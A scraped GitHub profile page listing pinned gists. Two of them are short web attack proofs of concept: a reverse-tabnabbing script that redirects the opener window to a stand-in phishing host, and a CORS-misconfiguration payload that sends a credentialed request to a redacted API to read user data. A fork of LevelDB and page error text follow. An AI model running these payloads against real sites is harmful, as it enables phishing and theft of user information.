Pinned Loading
-
Reverse Tabnabbing Web Attack | OWAS...
Reverse Tabnabbing Web Attack | OWASP Foundation 1<script>
2if (window.opener) window.opener.parent.location.replace('http://phishing.com');
3if (window.parent != window) window.parent.location.replace('http://phishing.com');
4</script>
-
Cross-origin resource sharing miscon...
Cross-origin resource sharing misconfig | steal user information 1<html>
2<script>
3var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://redacted.com/api/users/number',true); req.withCredentials = true; req.send('{}'); function reqListener() { alert(this.responseText); };
4</script>
5</html>
-
-
google/leveldb
google/leveldb PublicLevelDB is a fast key-value storage library written at Google that provides an ordered mapping from string keys to string values.
Something went wrong, please refresh the page to try again.
If the problem persists, check the GitHub status page or contact support.
If the problem persists, check the GitHub status page or contact support.